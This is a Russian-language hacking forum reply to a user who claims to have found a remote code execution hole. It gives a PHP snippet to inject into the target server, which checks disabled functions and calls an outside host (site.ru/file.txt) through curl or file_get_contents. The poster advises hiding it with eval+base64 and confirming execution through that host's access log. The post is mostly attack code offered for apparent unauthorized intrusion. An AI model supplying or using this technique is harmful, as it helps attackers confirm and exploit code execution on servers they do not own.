ТС, ты хоть пхп для начала выучи, чтоли. Ты уже второй месяц чего-то там взламываешь. За это время можно-бы было выучить язык и больше никогда не создавать нубских топиков.
По сабжу.
Цитата:
Сообщение от Sensoft
Sensoft said:
↑
нашёл дыру RCE
|
Для начала надо убедиться что пхп-код вообще выполняется на сервере. Если это RCE то запусти такой код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://site.ru/file.txt'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$banned[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ini_get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'disable_functions'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]function_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'curl_init'[/COLOR][COLOR="#007700"]) && ![/COLOR][COLOR="#0000BB"]is_int[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$banned[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'curl_'[/COLOR][COLOR="#007700"]))) {
[/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]
Ну или то-же самое под eval+base64. Затем идёшь в админку хостинга site.ru и смотришь в логе веб-сервера заходил-ли кто на /file.txt. Если в логе есть запись с этим uri - значит код на сервере запускается. Ели нет - либо функции заблокированы в disable_functions, либо вообще RCE не работает, что скорее всего. |
